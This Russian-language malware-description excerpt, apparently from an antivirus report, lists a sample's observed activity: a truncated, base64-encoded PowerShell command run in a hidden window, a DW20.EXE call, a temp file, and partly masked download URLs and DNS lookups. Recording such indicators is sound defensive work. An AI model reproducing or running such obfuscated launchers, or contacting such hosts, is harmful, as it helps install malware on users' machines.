Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAGgAYQA5AG4AOABzAD0AKAAnAFEAJwArACcAbAAnACsAKAAnADgAJwArACcAbwBfAGYAaAAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBzAGUAUgBQAFIATwBGAEkAbA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\1112567.cvr
- http://pr####kitchens.com/recurringo/fRe/
- http://www.dj###sor.com/error/w7G3/
- http://da###buzz.net/css/CyKg/
- http://ca####rniaasa.com/californiaasa.com/8t/
- http://vi###brown.com/e3c0ngfjc/N/
- DNS ASK pr####kitchens.com
- DNS ASK dj###sor.com
- DNS ASK da###buzz.net
- DNS ASK wi#####pitalmgmt.net
- DNS ASK ca####rniaasa.com
- DNS ASK vi###brown.com
- DNS ASK kh####mischl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAGgAYQA5AG4AOABzAD0AKAAnAFEAJwArACcAbAAnACsAKAAnADgAJwArACcAbwBfAGYAaAAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBzAGUAUgBQAFIATwBGAEkAbA...' (со скрытым окном)